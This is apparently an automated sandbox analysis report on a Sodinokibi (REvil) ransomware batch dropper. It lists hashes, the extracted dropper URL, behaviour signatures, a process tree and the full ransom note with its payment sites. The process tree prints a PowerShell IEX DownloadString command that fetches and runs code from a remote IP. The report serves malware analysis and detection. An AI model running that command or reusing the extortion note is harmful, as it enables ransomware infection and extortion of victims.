Analysis

  • max time kernel
    118s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    24-08-2020 17:10

General

  • Target

    78db7807ce9e00993f72a5410cc869e8.bat

  • Size

    218B

  • MD5

    289804e7e330a37b07416d754819db89

  • SHA1

    8ed98b81615c3571fad40a840eae66f2de5fb035

  • SHA256

    d9632dbb498dcc5c817f3d28376b83ce717767e8f2eda31dca931a781785dc09

  • SHA512

    ac9649099ea34f88787d84761b3ea53acc436e847d91d2ac046d95cd176d8fe57a63b58ed726fae6f02507fe197e229ae664a4c903531642cd320ce1eeacce40

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8

Extracted

Path

C:\754692-read-me.txt

Family

sodinokibi

Ransom Note
---=== Welcome Delco Automation Inc ===--- [+] Whats Happen? [+] Your network has been penetrated. Your files are encrypted with strong military algorithm, and currently unavailable. You can check it: all files on your system has extension 754692. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). Also, all your business info copyed to our servers. Personal data and business contacts extracted. If you do not take action to contact us, the data will be published for free access to everyone. As soon as we receive the payment, all data will be deleted from our servers. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8922150D7256EA7B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/8922150D7256EA7B Contact with us in chat on website. You have 3 days. If you need more time to make a decision and collect money for payment - inform the support chat about this. [+] How will the decryption process proceed after payment? [+] After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: tC29lHEylLB5mBeXUHSdcqFQlp2OLjKgsHQHXisq8WnGJwl5u2W1wC9H+LuvV2dC 9chwLHVvPeUiG6L9z0N+yvk2bV3FFfu7MXvJb2wNxz0hWHanb/nd4W3fYcSyZaUb 7Rb2YlfXleyxDBE0hUgRMIvsI2ZjtncIi2JepZWOF1tNVDJSxb4bmYiJ9jVsqiR0 xOLiZSydvQX574W6fdlARtcwJX0PGMmVQ5mLV6XY0QnFUXCdimv1jNDYV0Hz1WGZ 6XB+8McBGEuub8oczXtDZLvasWnfxK9DINCFFADYfQTLxx6rUgAWLDRJWoT2nKMZ 9835oKc+iCjju6Dl+5APphygXVKH7hOgNUTsEPOSBtiIp7Jv4HyCFR3hsDAjNUMz 8wK+S5E5WyURkj5LykvGr/UT0y3vEDae+OQv4xzB336AjMj65lwm4zLQkZ3OVYEv UJ4nTc/O/PzuXBtgnKr67jOatHl9PL9KeMjl03B9KPdfFyDwi2Q5SFZd+8OiyMk1 8YlsGI/8j4Q1ttAMU7yqATorNzs6DofPXpHKFlBICAhHzKuqlDq3DxCfJkiuGU09 nHkLHssQcR/zAI/wYGGp9fk9iftX4Ag8t3/inhfKKw9KnQFjK+BfMQDLkCWwiXMF b2tXmLgdSydFzgpDkx/1K1sdYhF5w2sdxAzJLSJQBa1uiyODWm6ThNh0qEs0WSo0 Q2rst8t60KPNta6PvPFfLboU5z8mD3PW9KnamYjp6PLernC7v+lE5k4x2pvNwuKH Gk5WWUq9eEMJheeceRGJhkxuGq/YOXRu95uTC2v2OF4QWZqTW8Je+cxefr0gxpPJ jVo650v9QahyH1Ra4TeSbX7VBU8Wo1ZgQD2C1l+fVf0BcpWovUMVBIa/UtYymLOP QuuRDctDYtPAIkfNQ6K38xCs8gmiIzDJBBf6szmhExs57hRu+AKAzLe8NBR2VUUh mZz/MKtKR0EWaoO/OG5Nkft8Z7PVIOKN9YtJcV4Dt71p3ssGYVft1Z1vAQtzMWf5 tpDdGNHzh9hfMossHBofF5fDZwfCT9JEHUYRuFMJuGIzQS54O6phhyLlMSlHGDKc dSR6CNzs8VEYVbuOhgzK1K6L/Nhb0ilGGyBkK8qmWGX66cZO92I+G/xrD6iVQMtJ bnaaBK7VKgp9mHAHRyUFbCM0Y2iBtEOzJcDijL8zUEb2JnEqPHDVBe7+S5t7K4uz gGnv1QfMp7Vy9LyP1RaEe/NwIAlkmRDh3EZ09ekBWbiwejMZmLAGwLaxyuqzrM9V 0hg1vOP2tnwTAaQCRBd/sthw34wc6WwptZgReSm7sv8= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 152 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 29 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\78db7807ce9e00993f72a5410cc869e8.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8');Invoke-VHCXYJMKGXZ;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1424
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1852

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1424-0-0x0000000000000000-mapping.dmp

  • memory/1424-1-0x0000000073BE0000-0x00000000742CE000-memory.dmp

    Filesize

    6.9MB

  • memory/1424-2-0x0000000000960000-0x0000000000961000-memory.dmp

    Filesize

    4KB

  • memory/1424-3-0x0000000004790000-0x0000000004791000-memory.dmp

    Filesize

    4KB

  • memory/1424-4-0x0000000002410000-0x0000000002411000-memory.dmp

    Filesize

    4KB

  • memory/1424-5-0x0000000005290000-0x0000000005291000-memory.dmp

    Filesize

    4KB

  • memory/1424-8-0x0000000006030000-0x0000000006031000-memory.dmp

    Filesize

    4KB

  • memory/1424-13-0x00000000060C0000-0x00000000060C1000-memory.dmp

    Filesize

    4KB

  • memory/1424-14-0x0000000006150000-0x0000000006151000-memory.dmp

    Filesize

    4KB

  • memory/1424-21-0x0000000006290000-0x0000000006291000-memory.dmp

    Filesize

    4KB

  • memory/1424-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB